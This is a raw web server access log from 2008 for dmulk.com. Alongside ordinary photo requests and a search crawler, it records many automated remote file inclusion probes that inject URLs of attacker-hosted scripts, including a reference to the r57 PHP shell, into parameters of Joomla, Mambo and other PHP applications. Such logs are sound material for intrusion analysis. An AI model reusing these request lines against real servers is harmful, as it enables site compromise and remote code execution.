212.53.64.40 - - [18/Aug/2008:12:59:15 -0700] "GET /?sourcedir=http://www.ghareng.com/alat/echo.txt?? HTTP/1.0" 200 10935 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:12:59:15 -0700] "GET /?sourcedir=http://www.ghareng.com/alat/echo.txt?? HTTP/1.0" 200 10935 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:12:59:15 -0700] "GET /?sourcedir=http://www.myboso.com/load.txt? HTTP/1.0" 200 10913 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:12:59:16 -0700] "GET /?sourcedir=http://www.myboso.com/load.txt? HTTP/1.0" 200 10913 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:12:59:16 -0700] "GET /?sourcedir=http://www.myboso.com/load.txt? HTTP/1.0" 200 10913 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:12:59:16 -0700] "GET /logs/?sourcedir=http://www.ghareng.com/alat/echo.txt?? HTTP/1.0" 200 61125 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:12:59:16 -0700] "GET /logs/?sourcedir=http://www.ghareng.com/alat/echo.txt?? HTTP/1.0" 200 61125 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:12:59:16 -0700] "GET /?sourcedir=http://www.myboso.com/load.txt? HTTP/1.0" 200 10913 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:12:59:16 -0700] "GET /logs/?sourcedir=http://www.ghareng.com/alat/echo.txt?? HTTP/1.0" 200 61125 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:12:59:17 -0700] "GET /logs/?sourcedir=http://www.ghareng.com/alat/echo.txt?? HTTP/1.0" 200 61125 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:12:59:17 -0700] "GET /logs/access_080313.log/?sourcedir=http://www.ghareng.com/alat/echo.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:12:59:18 -0700] "GET /?sourcedir=http://www.ghareng.com/alat/echo.txt?? HTTP/1.0" 200 10935 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:12:59:19 -0700] "GET /?sourcedir=http://www.myboso.com/load.txt? HTTP/1.0" 200 10913 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:12:59:19 -0700] "GET /logs/?sourcedir=http://www.ghareng.com/alat/echo.txt?? HTTP/1.0" 200 61125 "-" "libwww-perl/5.53" "www.dmulk.com"
64.105.33.158 - - [18/Aug/2008:12:59:42 -0700] "GET /logs/access_080226.log/index.php?lang=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.185.237.191 - - [18/Aug/2008:12:59:50 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [18/Aug/2008:12:59:50 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [18/Aug/2008:12:59:51 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [18/Aug/2008:12:59:51 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
201.80.26.155 - - [18/Aug/2008:13:00:00 -0700] "GET /logs/access_080404.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://adamari.net/img/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
201.80.26.155 - - [18/Aug/2008:13:00:00 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://adamari.net/img/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
201.80.26.155 - - [18/Aug/2008:13:00:01 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://adamari.net/img/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:13:00:11 -0700] "GET /logs/access_080213.log/?sourcedir=http://www.myboso.com/echo.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:13:00:11 -0700] "GET /?sourcedir=http://www.myboso.com/echo.txt?? HTTP/1.0" 200 10919 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:13:00:12 -0700] "GET /logs/?sourcedir=http://www.myboso.com/echo.txt?? HTTP/1.0" 200 61125 "-" "libwww-perl/5.53" "www.dmulk.com"
201.80.26.155 - - [18/Aug/2008:13:00:19 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://adamari.net/img/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.29.70.187 - - [18/Aug/2008:13:00:27 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://209.85.60.69/~forohipn/otro/clientscript/vbulletin_css/css.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
72.29.70.187 - - [18/Aug/2008:13:00:27 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://209.85.60.69/~forohipn/otro/clientscript/vbulletin_css/css.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
64.105.33.158 - - [18/Aug/2008:13:00:37 -0700] "GET /logs/access_080226.log/index.php?lang=en&page=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.80.26.155 - - [18/Aug/2008:13:00:45 -0700] "GET /logs/access_080103.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://adamari.net/img/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:13:00:51 -0700] "GET /logs/access_080806.log/?sourcedir=http://www.myboso.com/echo.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
12.196.3.126 - - [18/Aug/2008:13:01:04 -0700] "GET /bikes/dteel/2008_01_26/IMG_4346M.JPG HTTP/1.1" 200 75886 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
12.196.3.126 - - [18/Aug/2008:13:01:04 -0700] "GET /bikes/dteel/2008_01_26/IMG_4338M.JPG HTTP/1.1" 200 76584 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
12.196.3.126 - - [18/Aug/2008:13:01:04 -0700] "GET /bikes/dteel/2008_01_26/IMG_4356M.JPG HTTP/1.1" 200 85422 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
12.196.3.126 - - [18/Aug/2008:13:01:04 -0700] "GET /bikes/dteel/2008_01_26/IMG_4347M.JPG HTTP/1.1" 200 93210 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
12.196.3.126 - - [18/Aug/2008:13:01:04 -0700] "GET /bikes/dteel/2008_01_26/IMG_4349M.JPG HTTP/1.1" 200 73896 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
12.196.3.126 - - [18/Aug/2008:13:01:04 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4359M.JPG HTTP/1.1" 200 106754 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
12.196.3.126 - - [18/Aug/2008:13:01:04 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4360M.JPG HTTP/1.1" 200 108624 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
12.196.3.126 - - [18/Aug/2008:13:01:04 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4365M.JPG HTTP/1.1" 200 105802 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
12.196.3.126 - - [18/Aug/2008:13:01:04 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4362M.JPG HTTP/1.1" 200 102833 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
12.196.3.126 - - [18/Aug/2008:13:01:04 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4366M.JPG HTTP/1.1" 200 86979 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
12.196.3.126 - - [18/Aug/2008:13:01:04 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4364M.JPG HTTP/1.1" 200 94330 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
12.196.3.126 - - [18/Aug/2008:13:01:04 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4375M.JPG HTTP/1.1" 200 85908 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
12.196.3.126 - - [18/Aug/2008:13:01:04 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4367M.JPG HTTP/1.1" 200 83489 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
12.196.3.126 - - [18/Aug/2008:13:01:04 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4369M.JPG HTTP/1.1" 200 102059 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
12.196.3.126 - - [18/Aug/2008:13:01:04 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4376M.JPG HTTP/1.1" 200 78015 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
12.196.3.126 - - [18/Aug/2008:13:01:04 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4374M.JPG HTTP/1.1" 200 114637 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
12.196.3.126 - - [18/Aug/2008:13:01:04 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4379M.JPG HTTP/1.1" 200 84804 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
12.196.3.126 - - [18/Aug/2008:13:01:04 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4387M.JPG HTTP/1.1" 200 63059 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
12.196.3.126 - - [18/Aug/2008:13:01:04 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4385M.JPG HTTP/1.1" 200 94524 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
12.196.3.126 - - [18/Aug/2008:13:01:04 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4380M.JPG HTTP/1.1" 200 83650 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
12.196.3.126 - - [18/Aug/2008:13:01:04 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4386M.JPG HTTP/1.1" 200 70821 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
12.196.3.126 - - [18/Aug/2008:13:01:04 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4377M.JPG HTTP/1.1" 200 87820 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
12.196.3.126 - - [18/Aug/2008:13:01:04 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4382M.JPG HTTP/1.1" 200 88270 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
12.196.3.126 - - [18/Aug/2008:13:01:04 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4384M.JPG HTTP/1.1" 200 96561 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
12.196.3.126 - - [18/Aug/2008:13:01:04 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4378M.JPG HTTP/1.1" 200 87412 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
12.196.3.126 - - [18/Aug/2008:13:01:04 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4383M.JPG HTTP/1.1" 200 88967 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
12.196.3.126 - - [18/Aug/2008:13:01:04 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4381M.JPG HTTP/1.1" 200 98779 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
208.98.1.215 - - [18/Aug/2008:13:01:15 -0700] "GET /logs/access_080211.log/r57.txthttp://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
208.98.1.215 - - [18/Aug/2008:13:01:15 -0700] "GET /r57.txthttp://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
208.98.1.215 - - [18/Aug/2008:13:01:20 -0700] "GET /logs/r57.txthttp://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
208.98.1.215 - - [18/Aug/2008:13:01:24 -0700] "GET /r57.txthttp://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
217.75.193.70 - - [18/Aug/2008:13:01:27 -0700] "GET /logs/access_080227.log//?path%5Bdocroot%5D=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.98.1.215 - - [18/Aug/2008:13:01:27 -0700] "GET /logs/access_080207.log/r57.txthttp://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
208.98.1.215 - - [18/Aug/2008:13:01:27 -0700] "GET /r57.txthttp://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
208.98.1.215 - - [18/Aug/2008:13:01:27 -0700] "GET /logs/r57.txthttp://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
217.75.193.70 - - [18/Aug/2008:13:01:28 -0700] "GET //?path%5Bdocroot%5D=http://lizartdisplay.com/di?? HTTP/1.1" 200 10946 "-" "libwww-perl/5.805" "www.dmulk.com"
217.75.193.70 - - [18/Aug/2008:13:01:29 -0700] "GET /logs//?path%5Bdocroot%5D=http://lizartdisplay.com/di?? HTTP/1.1" 200 61146 "-" "libwww-perl/5.805" "www.dmulk.com"
208.98.1.215 - - [18/Aug/2008:13:01:32 -0700] "GET /logs/access_080207.log/r57.txthttp://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
208.98.1.215 - - [18/Aug/2008:13:01:32 -0700] "GET /r57.txthttp://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
208.98.1.215 - - [18/Aug/2008:13:01:40 -0700] "GET /logs/access_080730.log/r57.txthttp://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
208.98.1.215 - - [18/Aug/2008:13:01:42 -0700] "GET /logs/access_080209.log/r57.txthttp://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
217.75.193.70 - - [18/Aug/2008:13:01:42 -0700] "GET /logs/access_080717.log//?path%5Bdocroot%5D=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:13:01:42 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.myboso.com/echo.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:13:01:43 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.myboso.com/echo.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
208.98.1.215 - - [18/Aug/2008:13:01:58 -0700] "GET /logs/access_080117.log/r57.txthttp://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
69.73.155.242 - - [18/Aug/2008:13:02:43 -0700] "GET /logs/access_080122.log/errors.php?error=http://adecova.com/descargas/babih.pdf1/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.73.155.242 - - [18/Aug/2008:13:02:44 -0700] "GET /errors.php?error=http://adecova.com/descargas/babih.pdf1/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.73.155.242 - - [18/Aug/2008:13:02:44 -0700] "GET /logs/errors.php?error=http://adecova.com/descargas/babih.pdf1/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
12.196.3.126 - - [18/Aug/2008:13:02:44 -0700] "GET /bikes/dteel/2008_02_08/IMG_4473s.JPG HTTP/1.1" 200 189740 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
12.196.3.126 - - [18/Aug/2008:13:02:44 -0700] "GET /bikes/dteel/2008_02_07/IMG_4452s.JPG HTTP/1.1" 200 243937 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
12.196.3.126 - - [18/Aug/2008:13:02:46 -0700] "GET /bikes/dteel/2008_02_07/IMG_4456s.JPG HTTP/1.1" 200 275747 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
12.196.3.126 - - [18/Aug/2008:13:02:46 -0700] "GET /bikes/dteel/2008_02_08/IMG_4486s.JPG HTTP/1.1" 200 266614 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
12.196.3.126 - - [18/Aug/2008:13:02:46 -0700] "GET /bikes/dteel/2008_02_07/IMG_4451s.JPG HTTP/1.1" 200 291037 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
12.196.3.126 - - [18/Aug/2008:13:02:46 -0700] "GET /bikes/dteel/2008_02_07/IMG_4459s.JPG HTTP/1.1" 200 310940 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
12.196.3.126 - - [18/Aug/2008:13:02:47 -0700] "GET /bikes/dteel/2008_02_07/IMG_4460s.JPG HTTP/1.1" 200 316892 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
12.196.3.126 - - [18/Aug/2008:13:02:47 -0700] "GET /bikes/dteel/2008_02_07/IMG_4461s.JPG HTTP/1.1" 200 313284 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
12.196.3.126 - - [18/Aug/2008:13:02:47 -0700] "GET /bikes/dteel/2008_02_07/IMG_4447s.JPG HTTP/1.1" 200 335611 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
64.105.33.158 - - [18/Aug/2008:13:03:18 -0700] "GET /logs/access_080615.log/index.php5?lang=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:13:03:22 -0700] "GET /logs/access_080213.log/?sourcedir=http://www.ghareng.com/alat/echo.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:13:03:22 -0700] "GET /logs/access_080213.log/?sourcedir=http://www.ghareng.com/alat/echo.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:13:03:22 -0700] "GET /logs/access_080213.log/?sourcedir=http://www.ghareng.com/alat/echo.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:13:03:31 -0700] "GET /logs/access_080213.log/?sourcedir=http://www.ghareng.com/alat/echo.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:13:03:31 -0700] "GET /logs/access_080213.log/?sourcedir=http://www.ghareng.com/alat/echo.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
201.80.26.155 - - [18/Aug/2008:13:03:39 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://adamari.net/img/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.249.67.201 - - [18/Aug/2008:13:03:43 -0700] "GET /blog/index.php/page/2/?show=slide&pageid=169&nggpage=3 HTTP/1.1" 200 88817 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
74.55.109.34 - - [18/Aug/2008:13:03:43 -0700] "GET /logs/access_080321.log//?option=com_custompages&cpage=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [18/Aug/2008:13:03:44 -0700] "GET //?option=com_custompages&cpage=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 10993 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [18/Aug/2008:13:03:44 -0700] "GET /logs//?option=com_custompages&cpage=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 61146 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.66.242 - - [18/Aug/2008:13:03:48 -0700] "GET /logs/access_080321.log//?option=com_custompages&cpage=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [18/Aug/2008:13:03:49 -0700] "GET //?option=com_custompages&cpage=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 10993 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [18/Aug/2008:13:03:49 -0700] "GET /logs//?option=com_custompages&cpage=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 61146 "-" "libwww-perl/5.812" "www.dmulk.com"
70.38.12.204 - - [18/Aug/2008:13:04:08 -0700] "GET /logs/access_080321.log//?option=com_custompages&cpage=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.12.204 - - [18/Aug/2008:13:04:09 -0700] "GET //?option=com_custompages&cpage=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 10993 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.12.204 - - [18/Aug/2008:13:04:09 -0700] "GET /logs//?option=com_custompages&cpage=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 61146 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.70.15 - - [18/Aug/2008:13:04:11 -0700] "GET /logs/access_080609.log//?custompluginfile[]=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.70.15 - - [18/Aug/2008:13:04:11 -0700] "GET /logs/access_080606.log//?custompluginfile[]=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.72.218.250 - - [18/Aug/2008:13:05:13 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
69.73.155.242 - - [18/Aug/2008:13:05:46 -0700] "GET /logs/access_080321.log//?option=com_custompages&cpage=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.73.155.242 - - [18/Aug/2008:13:05:48 -0700] "GET //?option=com_custompages&cpage=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 10977 "-" "libwww-perl/5.812" "www.dmulk.com"
